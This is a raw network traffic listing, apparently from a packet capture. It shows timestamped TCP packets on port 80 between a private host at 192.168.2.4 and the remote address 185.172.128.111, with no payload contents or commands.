Apr 23, 2024 09:26:57.596090078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596090078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596090078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596147060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596203089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596223116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596223116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596223116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596239090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596251011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596276999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596283913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596313000 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596343040 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596349955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596363068 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596386909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596425056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596431017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596431017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596461058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596470118 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596496105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596529961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596545935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596545935 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596565008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596580982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596601009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596606970 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596636057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596657038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596689939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808192015 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808213949 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808228970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808244944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808259964 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808274984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808290958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808294058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808294058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808315039 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808331966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808346987 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808366060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808372974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808372974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808372974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808373928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808384895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808402061 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808409929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808409929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808419943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808430910 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808438063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808451891 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808455944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808473110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808479071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808479071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808490992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808502913 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808510065 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808522940 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808526993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808543921 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808545113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808563948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808571100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808571100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808582067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808598995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808609962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808609962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808617115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808634043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808639050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808639050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808650970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808660984 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808669090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808685064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808701038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808702946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808703899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808722019 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808723927 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808738947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808747053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808747053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808760881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808770895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808778048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808789968 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808794975 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808808088 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808811903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808826923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808828115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808845043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808846951 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808861017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808872938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808872938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808880091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.808893919 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.808939934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.014666080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014688969 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014704943 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014800072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014816999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014832973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014847994 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014863014 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014887094 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014902115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014902115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.014902115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.014902115 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.014919043 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014935970 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014951944 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014969110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014985085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.014990091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.014990091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.014990091 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015002012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015017986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015027046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015034914 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015052080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015067101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015083075 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015089035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015089035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015098095 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015111923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015115976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015132904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015147924 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015162945 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015172005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015180111 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015196085 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015197992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015212059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015227079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015237093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015243053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015259981 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015264034 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015276909 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015291929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015294075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015316010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015325069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015332937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015345097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015350103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015366077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015381098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015392065 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015397072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015413046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015429020 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015435934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015445948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015460968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015476942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015492916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015496016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015496016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015508890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015525103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015527964 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015541077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015547037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015558004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015573978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015589952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015598059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015613079 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015619993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015630007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015645027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015645027 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015667915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015682936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015697956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015713930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015724897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015724897 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015729904 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015748978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015757084 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015764952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015779018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015780926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015796900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015811920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015819073 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015829086 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015845060 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015861034 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015871048 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015877008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015893936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015897036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015909910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015925884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015927076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015944004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015959978 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015965939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015975952 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.015990973 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.015991926 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.016009092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.016024113 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.016040087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.016042948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.016043901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.016055107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.016093016 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.016144037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.221882105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.221946955 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.221983910 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222019911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222054958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222090006 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222126961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222122908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222122908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222124100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222124100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222124100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222163916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222213030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222213030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222213030 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222218990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222256899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222285032 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222292900 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222306967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222331047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222347021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222383022 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222383976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222418070 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222438097 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222470045 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222480059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222506046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222543001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222556114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222556114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222579956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222594976 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222631931 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222631931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222668886 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222678900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222704887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222714901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222739935 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222759962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222774982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222784042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222810030 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222845078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222862959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222862959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222879887 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222887993 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222915888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222925901 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222951889 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222976923 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.222987890 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.222997904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223026037 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223051071 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223062038 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223073006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223098040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223114014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223133087 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223169088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223170042 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223196983 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223206997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223215103 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223242998 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223263025 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223278046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223304033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223314047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223328114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223350048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223367929 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223386049 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223413944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223423004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223434925 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223458052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223473072 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223495960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223515987 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223531961 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223539114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223567009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223592043 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223603010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223623037 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223639011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223663092 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223673105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223692894 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223709106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223731041 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223742962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223762035 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223778009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223798990 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223814011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:58.223828077 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:58.223849058 CEST	80	49730	185.172.128.111	192.168.2.4
